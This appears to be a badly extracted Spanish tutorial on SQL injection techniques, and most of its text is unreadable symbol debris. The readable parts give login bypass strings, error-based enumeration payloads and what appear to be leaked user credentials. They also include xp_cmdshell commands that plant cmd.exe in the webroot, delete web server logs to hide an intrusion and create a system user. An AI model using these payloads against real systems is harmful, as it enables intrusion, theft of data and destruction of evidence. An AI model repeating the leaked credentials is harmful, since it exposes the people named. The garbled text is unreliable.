Documentos de Académico
Documentos de Profesional
Documentos de Cultura
Tecnicas de SQL Injection
Tecnicas de SQL Injection
!
#$%&
"
'
" * +"
(
,# .
/
"0#$%
'
"
, *
) 1 % )" + !
"
, *
, ")
- **
2 #$% '
"- " "
3 #$% 4
)
?
@
B
C
) 5
,
! )
%"
"
5 "
67"
* 8*
"
. 5 9 ", #
:)
*
*
#.
8<
+
"
" )
>; ) 5
4 '
" ;
4 #
!
4 ! ', *
#$% 4
: "'
"
' "
"A
"
*
"+%
"'
; "
A " "' ) "
5.
"
""
"
/
;
" =
"
"
" .>
", "
"
" 8<
" "
"
"
"
"
"
"
"
)4
" 7
# )
"
"
+ =
)
& " +
. "
!
.
7
&
"
"+
"
9
&
"
" "
. "
( "
&
D
"
9 &
"
"
*
6
"
6
.
"
" 6 ( ""
" 4 ""
"
7<
"
) "
"
" "
"
&"
"
"& "=
. (( #
2
;
" "
"
*
5
"
.
"
6 " .
"
"
" 6
"
&
"
(
"
")
* 9
"
7 " 6 (&
. 4 #$%&
" "
" "
" *
"
"
"
!% & '
5 *
"
D
C 2
.
6 " .
'
"
* 9
"
" 9 ( " ) 4
&
"
* )
4 "
"
%
#8$ 8%
*
*
&
!
% .
. =
4 " " "
"
+&
"& +
"
D "
"
"
&
.
"
)
" "
(
&
"
"
"
)4
"
) 4 )
6
9
"
( )
"
+
8 . "
6 7 "
6 " . "&
"
&
"
>#
"
"
) "
"
9
. 4 #$% " 6
E#+) " & :
+
"
51#
CB@ +
"
9
"
.& 9
+" " ")
"
"
"
. 4
"& 9
"
") " "
.
"
4
"
. 4
+ % . . >
*
6
D
C &
#8$ 8%
#$% E#
$ + % . . F
" D "
,-
&
9
9
+ =
*
<F
#: * "
" 6"
.=
.
"
. 4
4
"
6 "
. 4 "
"
"
*
CB
" #$%BC + #$%C &
"
6
"
"
"
6
.
"
"
"
"
"
"
&
"
"
)
6 "
"
>!
#$%>
"
9
4 "
) )
"
6
"
" . "
4 " "=
9
"
#$%2
.
6
"& 9
"
+
6 6 "
6
. 4
(
) * # +,
$ ( " " "
"
" ) "
"
" 9
- +
" *&
) 4 ) 4
"
"
9 " =
" "
=
,:# !
9
"&
9
" *
"
& " )
) 4
9 "
6 "
2
G
" E,
.
*
&
" 6 "
"
"
"
""
F&
" *
) "
D= " " )
" ) :# & " "
" )
"
)
"
.
" 6
"
!'
"
"
%51
3
5
) &
( ) "
"C &
9 "
& )
9
. )
"
6"
9
4
& "
9
" )
*
" . =
"
6 6 "
# &
)
" 6 "
2F
" 9
" *
9
"
)
:# 2
%
"
)
7
" 9
" ") "
) "
"
9
"
8
""
:#
"
6 &
6
'
"
9
&
- "
*
"
"
"
, "
"
6 "6 "
"
#$% @
&
"
"
.
"
"
"
"
"
.
"
" "&
"
"&
"-
.#
'
*
"
" .
) =
.
9
6 "& +
9 6
"
"
"
" .
)
"
"
#+) "
:#
+
9
"
" 1;& +
" *
0 "
"
#0#$%& ) 4
&
"
"
F&
"
"
"
6 "
#$%
.
&
"
" *
)
-
6 "
)
" 1;> H "
D CC2
"
&"
"
G
&
#+) "
)=
" "
"
E#$%
6 "
"
.
"
"
) "
" 1;
67"
"
CCB
.
)
9
9 " )
" - "
9 "
. "
" .
" "
D CC
=
" * #$% # 6 3 *
( "
"
) >
( =
& +
9
=
( )
.
"9
"
.
6
, "
G
&
"
" *
"
"
"
:#
" )
7"
"
"
&"
*
*
"9
" *&
2
G
" 1;
" .
"
9
"
"
E!
9
) 4 =
"
*
9
9
#$% # 6
& "
" "
"
"
""
<
" *&
*
"
"& "
" "
"
.
+
) "
"
?
# )
4
)6
")
& *
" "
) =
+
"
" #$% )
" &
"
"
) "
"
. 9
.
&
"9
"
"
&
"9 &
"
)
"
) 4
"
E' "
" "
"
#0#$% # 6 & 9
"
)
" ) 4
.
&
"
"
J
6"
8
6
"
"
"
)
&
"
"
.
"
"
"
.
)4
"
%#
"
&
"
6 &
.
"
"
" #0#$%& "
" "&
9
8
"
>#5> +
"
8
)
<
"
#$%
9
"
#0#$% 9
" 9 "
"
"
5
E8"
# 6 &
5
) "
+ )
"
.
=
<
<
6 "
"
""
&
"
9
(
) "
+*
"
"
"
"
" .
) " "
" I
+
) 4
&
"
&
*
"
6
#0#$% # 6 &
""
6
"
"
1 % )"
+ =
"
"
"
"
"& ) = "
4 "
"
) 4
"
"
"
"
"
)7
&
" E#51& 5
; M& !N #!N& ;'!&
(
9
" 9 "
"
& "
" " ;'! ! + 1
!
"
&
"
"
+
F
*
4
4
"
"
"
"
"
"&
.
"
"
)
" )
"9
"
9
.
"
= &
9
(.
"
"6
4 " EIF
"
) "
" "&"
6 . "&
"
4
"
"6
"
".
" *
.
"
> > EKKF
"
"
"
"
6
7
"&
+ " 6
""
"*
( 1
( * $#
#0#$%
6
L"&
.
"
"
"
#0#$%
"
#5 "
"
"
<
"
"
") "
" "
;
"
"
"
"
"
"
&
" 6
;'! 332
.
"
"
" 9
"
#0#$%
.
)9
#0#$%
*
6 "
6 #$% E!
4
7
& "
6
"&
"6
)
" "
=
#5
"
9
""
#$%
)7
"&
;:,:#
"
"
" D "
"
.
"
"
"
"
"
"
"
"
) "
" *
"
"
+ (
&
,#))
;
, 6
% *
#$% # 6 > O#$% # 6
"*
"
- ** "
"
" > 8"
9
"
" *
6
P
&
,!
"
)
<
" "6
"
"
"
"
+"
"
")
"
"
"
"
"
)
!
" Q
" Q
" Q .
"
<
"
"
"
"
&
"
"
) **
#$%&
>
M . 8< " G
) **
" )
"
>" 6Q
* EF>
""
Q M9
Q
"
Q <
Q" "9 "
Q"9 .
6= "
&
"
")
")
" < =
> E #-1 B303B 022CB0@F
)
<
<
<
<
<
<
"
6 "&
"
"
"
"
"
# )
*
"
"
9
*
"
#$% # 6
9
)
". *
>;
! *
" "
, ")
1: < "
" + "
"
"
"&
"
"
+
"
>
M . 8< "
" 9
Q
Q"
Q "
Q
" "
6
"
<
<
<
<
"
6)
-"""
" Q "
" Q
"
+
+
+
""
"
>&
"
G
(
"
"2
% &
"
"
"
6
"
"
)
& #$% "
*
" <"
"
"
:
& ; " 0#$%
"& < "
.
"
& "
" "
.
"
% &
/ 51;
8H:R8
,81S
+%
++
"&
"
"
"
(
" "
" "
"
6
.
.# .
&
6 " ) "&
" =
) " =
"
" ) " . .
*
"
"
*
#!
.# .
." "
"
"* .
.
"
."
"6
" "
."
"
&
) "
"
J
*
"
*
"
"
"9
) "
"
"
"+
"
)
) "
"
"
"
"
%! # #!
(
A :
G 8 8
(
(
/ : ! -S
5H 1/
: ,8 -S
"
&
.
.
6
"
.# .
+ )
"
"
*
,8%8;8
""
+
(
!,5;8
%! # #!
% "
"
" "
1#8 ;
5
" E!%0#$%
" *F
"
(
+
"
"
"
"
(
8
5%;8
#8%8';
"
(
(
(
% &
' 85;8
, :!
% &
. 4
(
(
"
"
"
*
" ." "9
"
.
"
< "
)
" ."
" 6
"
"
"9
)
" 6
"
" ." ""
"
" =* "
9
) " "*
.
" ." ""
"
"
*
"9
B
3
% &
T
U
TU
TV
UV
V
-8;G881
% R8
1
+
,"
.
.
9
+
(
.
*
"
9
9
9
9
6
"
(
(
"
."
"
) "
"
4 & !
"
"
"
."
"
) >; ) >F
&
"
"
"
"&
"
"
"
. 4 #$%& "
"
" !
4
"
# )
"
&
"
"
&
6
"
"
#$% "
"
=
& "
"
"
"
"
""
"
4
"
"
"
#$%
&
. *
" )
&
"
&
7
9
"
+
4
"
*
"*
& "
"
6 " 9
+
.
"
9
")
"5
#
#
67
"
H
)
")
" 9
=
"
&
"
'
"
.
8
&
>&
"
"
"
9 "& " .
" >5 9 "
9
*
6 &
"
"9
" #$% )
"&
"
C
"
"
" )
" " =
# )
&
)4
<
"
" )
" .
*
" *
" "
"6 "
"
"
") " " "
" 6
"
9
.
" *
"
"
"
!
.
4
"
"
. 4
. "
)4 6
" &+
"
"
"
) 4
*
( 6!
# )
) "
&
"
"
9
8"
"
4
#$%&
5
+
>#$%
#0#$%&
" *
"
"
"".
"
"
" 8
"
" =
"
*
.
9 .
)4 6
"
>
"
"9
&
" "
J
"
"
&
9
<
"
8"
"
"
"
"
&) 4
"
"
.
&
"
"
"
&
"
#
! 6 . "
#$%
"
"
" 7
.J
.
&
"
.
"
"
0 8*
"
05 9 ", #
0 :)
*
0 8<
+
0'
" ;
,
J
#
9
"
" !
"
"&
& "
6"
<
9 "
"
"
6
+
9
)
7<
". *
"
6
"9
9
. "
&.
"
"*
+ ""
) "
"
"
" 6
" )
"
4! $ (! &
9
"
" 6
.= "
"
"
"
"
"
"G
"
"
"
5#!
=" " 9
&*
"
<
"
"
" 6
"
<
"
* "& "
".
*
"
" =*
*
# 6 "
) " "
" #0
G
"
9
*
"
"
( "
7<
"
"
"
+
6
"9
(
"
8"
"
= "
"
&
"9
"
"
"
9
"
)
6"
"
"
) "
&
" "
*
" D
:M&
"
" " "
"
"+
8
"
"
"
"
&" "
6
"
"&
"
)
6 (
&
"
"
""
"
"
"
6
)& "
) "
" 6
"
"
"
9
"
" : %
*
"
)
"
&
+ =
) "
"
"
.
.
<
"
.J
6
"
"
" *
9 "
"
"
"
&
"
)9
"
"
)&
" 6
"& + " )
. "
"
) M.
"
*
"
*
*
"
"
"
6
""
"
"
"
"
"&
)7
;
+ =
6
6
" )
) 4
"
"
6"
) "
"
"
"
"
*
.
) "
* .
9
+
"
J
.
"
"
"
"
. " "
. &) "
" 6
"
"
5#!
"
"
F 8
+
6
"
"
"
&
(
"
. " "
.
5#!
) "
" E!
*
; %& 9
) "
"& .
; % + 6 6
&
*
&
"
. " "
*
6
+
. "=
<
*
) )
"
"
"
6 "
6 6
"
" "
"
.
"
"II )
&
"
4
(
"
&
"
"= +
"
"
" .
&" .
&
"
&
) )
"
"
<
"
%
"
)
"
"
"
http://www.objetivo.com/libreria.asp?edicion='Noviembre'
!
"
" & "
"
"
" ) +
)
"
"
L1 6
) L " "
"
"
) 4
.
"*
" "
"
%
9
"
=
+
"
"
"
"
"
.= EN,F
)7 " "
6
.
5#! 9
8 "
" &
+
) )
.
)
"
"
"
. 9
*
6 " 6
.
"
&
"
9
=
>&
.
&
"
) "
" "
"
"
9
.
& "
"
" "*
"
"
"
"
*
"
)
7
"
"
+ " +
"
9
+
) "
#$%
5
"
&
E'
"
" "
F
) "
"
" !
"
% L E'
"
4
&"
+
9
"
)
*
+
F "
"&
"
"
""
" "
) 4
"
" )
L
"
")
+
" * #$% # 6
"
"
*
6
9
"
9
6
"" "
#$%
9
*
"
"9
4
(
" 4
&
"
.
"
"
=
.
"
"
"
" +
&
"
"
"
"
)
"
Usuario : An'gel
Password : 338xD
) "
"
"
" .
" ""
&
"
(
""
"
9
"
"
"
"
username = 'An'
edicion = 'N'
% . & ".
"&
"
"
5
"
9
"
""
8
"
9
"
#$%& *
"
" = "
&
"
67"
" 4
"
"
+
&
"
.
"
4
"
9 9
"
#$% # 6
( &
&
". *
"
"
L5 L + L1L II
9
.
"6"
) "
"+ "
"
*
"
"
(
9
6
"
"
"9
.J
6
"
%& "
" "
&
(
* "
"&
.
"
8" "
"
) "
8
"
*
"
+
"
") " "
"
"
"
6 &
6 6
"
.
) =
& 9
"
"
)7 " ".
9 "
7
"
"
# 6
" . #$%
(
(
6
)
"
E84
"
)4
.
"
.
& " 6
9
" " "
+
) 4
" "
" . &
"
6 "&
" *
"
9
" "
&
) )
"
"
)"
"
"
"
"
"
. "
.
"
.J .
"
"
"
&
7<
)
"
&
<
"
4
9
)7 & "
"
"
" 6
"
"
"
?
>8
# 6
>F
"6 "
9
+
#$%
" 6 )
" " 9
"&
9
) "
" ) 4 + "
(
"
' " '
&
"
) 4 >
. #$%
> EH
B
*
" +
"
"F
9
"
"
*
.
".
"
<
2
1
%
&
'
+!
0
(#)*
,
-.
%
,
123
% &
)
"
&
&
)
+
"
(
"
*
" I
"" "
) "
"
+ =
"
&
"9
""
"" .
)4 6 6
6
"
"
!8 (
.
" 7
"
#$% 4
.
"
9
" " "& 9
; %& 5#!& & "
" " 6 ( 9
# 6 '
" 9
"
)
"&
6
) & "
&
4
& .
&
6
" "*
"
" &
) "
"
)
.
"
*
.
.
>.
. >F
" > )
"6
"
"&
" "& +
"9
.J ) "
E!
" ."
>
>% "
'
">
"
) "
"
"
"
"
" "
;:,5 *
" " 6 (
"
(
&"
.
"
=
&
"
.
.
"
"
"
"&
"
"
" "
"
9
7
= "
" "6
"
)
" " * " *
"
)
6
& "=
" "
"
"&
.
"
"
+ =
"
.
" 7
&
6
" # )
& 1: )
)
"
"
&
"6
"
"
) E8"
"
" )
6 "+
.
F
+ =
)
. "
"
"
"
. "
"
"
<
#$%
"&
.J "
"
+
) 4
*
" EH > % "
'
">F
" >
"
& "
6
" " 9
)7
">
" )
) "
"
6
"
6=
"> "
*
*
"
"&
+J
" &
.
"
. " =
) "
9 "
3
$
(!
6)
"
"
"
"
"
"
"+
"
" "
* "
6"
"
H 7
"
"
! "
*
=
"
.
"&
"
"
.
#$%
""
"
. I) &
E> L >F
*
" )
6
"
+
"
(!
"
.J
"
"
"
"6"
+
"
9
"
"
6
+ =
)
*
) &
3(
"
& #
" : 0% &
"
" "+
"
.= & ! . "
" " D "
9
6" +
) " <
"
"+*
" " "
"
&
9
4 4 4
)
"
.
"
4 " "
"
"
" "" "
" )
"&
9
"
"& "
. "
"
6"
*
.
5 "
"
"
" &
)
)
*
"&
)
. "
"
+
* "&
" " )
6 " "
"
"
*
"
.
!
6
"
"
. *=
"
"
"
"
"& : 0%
.=
""
$
! .
86
,
*
"
"
"
) &
"
8"
"
* .
<
"
. *=
size=2>Nombre</FONT></B></TD>
<TD><B><FONT face="Arial, Helvetica, sans-serif"
size=2>Clave</FONT></B></TD></TR>
<TR bgColor=#ffcccc>
<TD><INPUT name=USERNAME> </TD>
<TD><INPUT type=password value="" name=PASSWORD>
</TD></TR>
<TR align=middle bgColor=#ff0066>
<TD colSpan=2><INPUT type=submit value=INGRESAR!
name=SUBMIT>
</TD></TR></TBODY></TABLE><BR><BR></FORM></TD>
<TD vAlign=top align=left width=10> </TD>
<TD vAlign=top align=left width=140>
<TABLE cellSpacing=0 cellPadding=0 width=140 border=0>
<TBODY>
---- Extracto ------------------------------------------!
"
9
.
*
5#! E!
"9
) &"
9 6
"
"
" "
)
.
(
"
" &
) 4
&
" F
. "
(
; %
. " " &
" " "
"
"
"
9
*
+
"
#$% " 6
"6"
"& +
"
"
"&
"
"
"
"
) "
(
"
"9
"
+
(
""
"
<"
6
9 =
6
)
)
"
*
"
"
4
=
"
"
#$%
"
"
" D
"
"
I :M&
"
+
'or 1=1
"
6
"
.
"
"
"&
.
"
@
1
"
""
.
"
"
6 6
+ =
<"
"
"
"
" "
"
"6
E
""
"
"
&
F&
,
0
Usuario : 'OR''='
Password : 'OR''='
5
4/
'
)
" > "
# )
"
&
"
">&
"
#$%
"&
.
+
"
<
"
(
" .
+
&
#.
""
+
"
6 .
"
4
)4
.
"
& "
"
&
"
6
+
> 00 > E, )
&
#$% 9
.
" "
6 &
.J
"
& "
"
6 "
&
6 4 .
F
"
" "
9 6 .
"
6"
"
"
"&
"
" .
"
>5
>
9
>
<"
> "
= &
"
"
"
"
" "
"
"= + " .
"
&
"6"
"
9
4
) 6
F
"
"
+
&
) )
"
"
">L>
" + > 00 > E, ) /
F
"
< "&
" )
"
"
"
">
"
) 4)
5 "
#$%
6 . "
"
"
'
*
+ =
$ 7! .
"
+
" )
"
"
.
"
"&
9
6
"
"
"
*
"
) 4
"
" 9
6
" *
"
6 .
.
""
5
6
"
"
>
"
9 "
<
+
"
" .
""
"
6
"
&
"
)
"
9 D
"
(
)
* "
)
)
"
"
"
<
"
" )
9
" .9
&
"
"
)
) "&
"
"
.
". *
1
"
"
) "
6 " )4
) "
" )4
"
"
8
". *
6" "
"
%
#
#$% # 6 &
+
"
&
" 6 . "
" 6
& "
>
"
& " ) +>
>
" "
) "
" #$% # 6
"
"&
"
"9 "
"
"
"
)
"
> 9 "
+
*.
" "
"
"
E'
+ <
" F& " "
"
"
"
" " .
&
. 9
"
" ) " "
"& +
" 9
"
"
&
4
&
"
6
"
" "
"
" 6 " "
"
& " 6 "
4
& "
+ *
"
" )
"
<
6 . &
" "
" .
"
'
;
""
6
##$%#8 H8
<
>< Q
)
"
)Q
"&
"*
. & "
*
"
$ 7! .
"
"
" "
17 !
"
".
& ) 4
! "
"
"
" *
"& +
" *
) "
"
8
4
.J
" " "& "
" " ) "+
B
. 6 9# +
&
% " 9 " , .
# 6
&
"
6"
"
"
"
" E8 "
"
) "
=
"&
4
"
(
+ ( & F
5
9
*
6
9
"
"
"
6
" &6
9
4
" "
)
"
"9
.J
4
"
&
.
" " 6
.
&
+
M
#$%&
"
"
&"
" " D "
" E' =
" 5
9
" 9 "
.
"
" 6
"
&
"
=
8
"
.
"
"6"
"
. 6 9
J
"
" "
)
&
"
"
&
F
&
*
" 9
*
&
&
EH
"
) )
)
&
'
6
"
*
>8*
.J
&
9
7
"
> "
&"
"
"
"> "
! 6
&
"
+
) (
, # "
" )
"&
"
"
"
"
&
"
&
"
"9
. "
>F &
"
. "
9
"
"
9
"
"
"
5"= +
6
"
&
.
) = "
&
+
1
67
)
: 3(
! ) )
7
"
) &
#$%
4
"
D
# )
"
"
"
"
.
& 4/
.
!
#&
" *
"
"
"
"
(
& "
" ")
" 9 )
" :,-' :%8 ,4 "
#$% # 6
.
"
9 &
&
"
" "E
)
"6
&
+
"
"
"9
"&
"
)
. "
) "
"
) "
. 7<
"
"
&
( = &
9
"
"
C
"9
1
"
"
"6
) "
&
"
"
"9
) "
! "
"
"
" D
6
6") "
. "
&" "
&+
"
6 ("
"&
+*
"
.1)
8
6
"9
*
" "
" 6 (
".
> L > E'
*
"
"
4
#
"
"
"
<
"
"
"
&
"
"
F
"
& 6
"
"
"
" .
&
:)6
%
"
E
2 !
3 8
?
.
1
"9
" <
" * #$%
<
) "
" "
>
)Q )
>F
"
*
)Q )
&
)
) "
"
(
" "
" "> . >
&
"
"
:,-'
"
" 9
"
6 +
:,-' 8
"
)Q
"
"
6"
"
"> "
.
>
*
3
%
)
010.8#* - "3.9$
(")-#)
123
:;<<
DB_Sql {
$Host
= "";
$Database = "";
$User
= "";
$Password = "";
$UseODBCCursor = 0;
$Link_ID
$Query_ID
$Record
$Row
var $Errno
var $Error
=
=
=
=
0;
0;
array();
0;
= 0;
= "";
"
"
. &"
*
*
A
*
"
)Q )
"
"
"
>" " >
" 6
) " X " + X! ""
"
9
"
( " " "
. "
"6
&
.
" 6
4
*
. 9
& " "& 9
*
9
9 6
"
" + 6
&
"
" .
"
"
.
"
"
<
9
"
" )
E8 "
"
F
:
) &
*
/
:M& 6
"
"
* 6
"
"&
*
+ "
"
"
+
. &
" 9
4
.
"
"
"
"
"
"
"
#$%&
6 "
" 6
"
) "
"
"
!
9
#$%
) "
9
" "
4
)
"
) "
"
.
"
*
"
"
"
"
6
"
"
#$%
"
4
"
&
"
&
"
"
! " 9
6 4 6 "
" )
"
) "
"
#
"6
"
"&
"
"
&
" "
) < 9
"
"
"
(
6
+)
"
"
"
9
"
"
B
"
*
"
7
"
9 D "
<
&
"
" 9
" 6 " " "
;;!
"
)4 6 & "
6 "
<
&
&
".
*
"'
"+%
) 4
9
7
"
<
""
"
"
"
" 6
% E8
"'
".
"
.
" 9
"
;;!
M
"F&
E5 .
. =
6
" "&
"
6 &
"
*
"
(
"
"
&
9
)
"
"
8" *
+
" *
" **
*
F&
.
" D " *
"
"
;;!
*
E8 "
" * # +1 &
"
.
"
) )4 6
. "
" E5 .
) " " " F& "
6
"
"
>! ""
>
Y
Y
H
*
-
&
"
! "
" "
*
(
*
8
"
. "
""
<
6
"
"
"
+
&
6 6
" ) "
!
"
"
"
*
9
"
7
) 4
!:#; )
<&
"
"
.
" .
+
)
"
)
> L > E'
9
"
"
"
F
&
*
" 6
"
)
"
"
"
E 6 .& .
6
""
(
>
" >
">
#$%&
" *
6
9 #$% E
4
:%8 ,-F )
"
"
"
6
" "
"
"
>
"
)4
H 6
(
"
"
> "
.
" .
" **
) "
9
)
"
4
!:#; 9
> "
"
"
<
"
6
6
" )" 6
6
(
"
)+&
" #$% 9
"
' " "
" *
"
9
< &
"
4
"&
" 4 " *
6 "
" "
" 6=
"
"
"
*
(
"
2
1
.
$
"
)*1(
5*'>
!
"
"
)
"
)
"
"
% )
9 6
6"
>
"
"
"
"
6
!
\
]
5
!
[
0
^
Q
9
6=
"
6
"
"
"
& +6
(
9 "
"
"
Z 0
Z?'
Q
<& "
"
9
"
"
6"
9
"
;;!
"
Z
Z2Z25
[ Z
Z2,
Z '
Z B
Z C
Z28
Z2'
"
- M# "
"
9
"
"
"
"
"
=
"
!:#;&
"
+
'
#
!
+'
, "!
"
8"
#.
.
'
! 7 ""
! 7 ""
+
OO
V
&
E
F
U
T
:MK
6
""
(
6
6=
"
&+ 6
"
"
"
)
"9
"
"9
)
!
"
"
"
*
"
H
"
9
6"
"
"
9
4
"
*
&
"
""
"
"
"
+
"
"
"
"
" *
"
"
> 6 .>&
"
& "
"
7
)
KK "
"
" 4 "
)
) "
E # 5 :#F& "=
"
5
"
"
9
6 6
"
"&
"
6
"
)7
"
9
&
&
"
=
:,-'
(
)
*
) &
" *
< +
(
"
"
"
"
"
6 !:#;
"
" )" 6 9
#$% # 6
" 6 6
*
"
"
.
" E " ,F
"
"
)
.
= &
*
"
# 5 :#
"
&6
"
".
"
"
#.
"
"
> . " >
> 6 >
"
&
" 9
"
# 5 :#&
.= & "
"
" 9
" )
"
>.
"
)+>
"
"
# 5 :#
"
"&
"
+
8" " =
"
> 6 .>
" )
,
"
)
*
"
"
"+
"
'group by usuarios.UserID,usuarios.UID,usuarios.Nombre
having 1=1
#!
'group by usuarios.UserID,usuarios.UID,usuarios.Nombre,
usuarios.Email having 1=1-#!
9 =&
" )" 6
"
+
)
".
> "
"8
> 8
9
" 9 & )
" .
*
)
" .
"
>
>
"
( "
#8%8'; .
E/
"1
F A=4 " 9
"
" !:#; ;;! 1: "
&"
9
"
" "
6
.
"
" "
"
) "
"& 4
6 9
#$%
6
+
E8"
" L.
6 . V 00F
,
*
"
)+
&
"
"
&
)
9
"
"
"
,& "
"
9
"
"
"
"
,& "
&
"
"
"
"
" "
" "
(
'
"
"
"
"1
) & "
*
"8
"
) &
" "
"" . "
9 ;:,:# "
"
#8%8'; .
&
"
"&
"
"
#8%8';
"
+ 9
*
" II 6
"
4
< " #
" "
.
(
)
=
" ) =
.
*
"+
)
7
"
"
"
E8"
"
>& >
<"
>
?> E, *
"
>#8%8'; _ A : ` a>
"
"
"
"
7
F "
(
. "
"
) "
>
>.
)+> + > 6 .>F "
> + >
2>&
"
9
"
="&"
* )
" "
"
"
"
"
"
) "
"
" III H
"&
(
"
+
=
9
"
" # *
"
(
"
.
&
"
"
+
% .
"
1 :1
"
.
+ 9
"
"
"
&
"
"
"
" ) "
""
#S#:-b8';# + #S#':%
1#
"
> ,>
*
9
" )
"
6
(
"
;:! E8 "
"
F %
" "
"
(
1
6
9 "
" 6
"
#8%8';
7 " "& "=
*
9 )
6 "
"
B
4
;:!&
"
"
;:! F
;:,:#
6
!:#;
%
" 9
"
"
.
)4
)
)
"
"
"
"
"
"
"
"
" &
"
"
" E!
>F
" >
!
"
&
"
"
"
"
"
" "
+J
")
"
"
.
(
"
.#
5
".
#&
&
6
"& "
)
"
&
"
"
&+
" &
) "
"
&
>#
9
)7 "
" " % .
"
D
*
"
"
*
"
"
+
" 6 (
9 "
"
) "
) + "
" 9
"
#$% > 1 :1>&
"
6
.
" "
EF> "
# )
"
1 :1
"
"
"
" >) " ">
. 4 #$%&
" 9
" J
" *
"& " )
J
6 " ) "
" !
4
&
"
1 :1& "
"
"
>
" "
"
"
" ) "
"
!
"
EF&
" )
"
"
*
"
"
J
>&
"
)
.
C
5
9
(
"
"4
) "
&
"&
"
".
" .
"
"
"
" 6
"
< +
"
+
"
"
"& .
!:#;
"
<
6
".
"
" 6
"
=
6 & )
)4
1
"
"
"
"
&
9
"
"
I8
, )
)
"
"
,>
9 "
" 6
E>
"
" "
&
"
"
"
9
6
"
4
4
" "
"
F
1:&
" 9 =
6 :,-'
"
" )
9
( "
" "
"
"
"
"
)
& "=
&
2
"
" 6
" #$% ) "
#$%KK&
"
8
"
"&
"&
"
"
"
"
)
#
"
"
"
"
)
" E! "
"
"
"
+
) "
"9 ".
"
&
.
"
""
"& "
.
#$% ! . *
& )" 6
1 &(
!
# 5 :#
6
" D
"
"
6
, "
.
)
"
&" *
"& "
"
)4
"
" "
" #$%
1 :1& 9
"
"
"
( & ; !: ,8 ,5;: 9
" "
9 "
#$% "
"
(!
*
"
9 "
<
="
>#
>
& #$% "
"
"
"
4
"
"
<
"
&
"
"
"
"
"
"
"
"
"
8
"
I
#$%
"
+
"
" 9
1H5 ' 5
" "
) "
"
+
"
"
"
<
"
!
&
"
> > .
>
" E!
.J
&
"
" "&
"
"
)
"
"
)
"
)
"
"
6"
"
>
>&
9 ;:,5 *
"
)4 6 & b 1;5
)
+8
>
.
" ,
&
"
&
9 F
.
.
"
&
""
.
)
6
"
"
EA
7
"
+
>5 6
6
"
" 6"
4 # #
"
" " # )!% #,
"
" "
."
,
"
" " ! ) ! *
"
" " ! *
M
"
" " ! * "
"
" " ! <#
"
'
"
.
-
"
"
" 4
" F
"
"
.
&9
"
<
' " 5 +
` a>& #$%
&
6
"
"
"
" 4 "
9
"
" "
" 4 "
*
> ,>
8"
IIF
"
!
:M&
4
*
*
"
(
" )
"& . "
" +
"
"
"
> .
F 9
"
" 9
" .
" " ) "& + " "
*
>86
"&
"
""
"
4
E%
"
9
9 "
+
2
4; !
6 (
" "
" )4
*
"
6 &
#!
!<
#$%&
!&
(!
(
"
"
>)
6
"
) "
" 7
" 9
"
"
(! , 8 .=
.
"&
. &
"
"9
"
"
A=4 " 9
*
4 . "
"
""
(
7
" " "
> $6 3 /
%
#$%
"
*
H 6
.
."
"
6 !:#;
>
*
)
)
.
"
"
"
"
"
) "
)
6
"
*
&
"
(! 6#; !
"
) "
E% 9
"
6
"
"
" *
"6
"
6
"
"
& "
(
*
1;:
9 " .
"
6"
(
F
*
"
" , + !G#
F+6
"
) =
2
H
+
<V
W
<
L
[L L[
<[
-> $6 3 , 8
<6
"[L]L*
6 ( "
#8%8';
EB
"
"
F"
<VLL "
U
<"
< "
(! 6#; !
"
&
"
"
"
<
"
)
"
(
"
*
"L
"
)
"
!:#;
" 4
*
<
00
&
"
"
6
*
:,-' 6 6
.)
"
" "
22
carla/cardie;MonicaA/amorcito;aliciafalcon/baby;dayana/ne
ne;Luz_d/carmen;mguevara/martha;Tiatere1/lima27;CMorena/2
11095;victor...
/Login.asp, line 85
2> $6 3 4! &
6 ( )
(
, :!&
"
"
"
"
(! 6#; !
") "
&
"&
"
)
" .
4
".
!
"
"
6 " "
"& 9
""
"
"
")
." "
"
"
(
"
6
6
" .
)
"9
&"
"
.
" 5
"
"
"9
) "
"
"
&
"
"
"
"""
"&
*
&
" "
"
. .
"
$+6 4
H
"
""
!,5;8
9
"
"
"
.
"
""
6=
!:#;
+
(
"
23
&
+
9
"
"
E5 9
."
9
"
"
#$% # 6 F
!:#;
"
&
"
1 4
$
"
4
"
" "
&
4
1#8 ;& )
&
" "
9 +
" "
"
&
KKKF
9
"&
" "
"
"
"
" 6
"
.
=
"
(
"& +
"9
9
6 "
"
)
"
7
.
"
"
&
"
"
)
"
""
")
"
(
" E'
"
&
(
!
. & +
"
4
. 9
=
6
"
9
" "
2?
5"=
"
".
"
&
"
9
=
(
"
.
" )
"
<"
" " "
" ) "
&
9
" "
"
!:#; 6=
:)6
7<
*
9 "
+
.
"
"
"+" " "
1#8 ;
*
"
4
"
"
+
&
"
+
&
6
"
"
&
!
.
!
.
" 7
"
"
)
" 6"
"
&
<
""
"
"
"
*
6
"*
" >8<
"
#$%
1:
"9
#
!
4
*
"
"
"
*
"
"
)
(
"
&
"
.
" * #$% # 6
">
"
"
$
% "
) "
II
#
"
"
"
6 "
?4;
<
$
" "
"
"
8< "
"
#0#$%& "
")
" 5
.
" "&
#
" & ,%%L" 9
"
&
*
#0#$% )
<
"
"
")
"
"
"
" <
"&
.
2@
"
"
&
"
5
" <
"
"&
" )
" *
"
"
"
N Q
"
> ">
4
"
"
"& "
"" "
" < Q
"
"
K6
" ;;!
) "
" "
"
"
"
"
"9
"
( =
"
"
""
" "
9 "
"
+ "
"
"
6 6= #$%
" ".
"
"
"
"
6
=
" *
"
" *
" "
)
.
4
"
) 4
"
=
)
&6
6
" " =
"
4
& "
"
"
)" 6
"
* "6
"6
" E8 "
"
"
"F
< Q
) 4
")
"
>
>
"
"
< Q
(
"
.
"
"
"
"*
E/
&
.
&
"
"1
&
9
#5
F
"
"
9
"
" & F
"
"
!
"
EXEC master..xp_cmdshell 'dir c:\inetpub\wwwroot\'
! 6
9
6
EXEC master..xp_cmdshell 'type
c:\inetpub\wwwroot\alguna_pagina.asp'
!
"
)
EXEC master..xp_cmdshell 'copy c:\winnt\system32\cmd.exe
c:\inetpub\wwwroot\chroot.exe'
! )
"
EXEC master..xp_cmdshell 'DIR
c:\winnt\system32\logfiles\w3svc1\'
EXEC master..xp_cmdshell 'NET STOP "Servicio de
publicacin en
World Wide Web"'
EXEC master..xp_cmdshell 'del
c:\winnt\system32\logfiles\w3svc1\
filelog.log'
EXEC master..xp_cmdshell 'NET START "Servicio de
publicacin en
World Wide Web"'
!
6 "
EXEC master..xp_cmdshell 'NET SHARE nombre=drive:path'
!
"
6 G
"
EXEC master..xp_cmdshell 'NET USER username password'
:M&
"
"
8<
" "
"
.
">&
"
"
"
" #
" >8<
"
)7 )
" +
">&
"
"
"
"
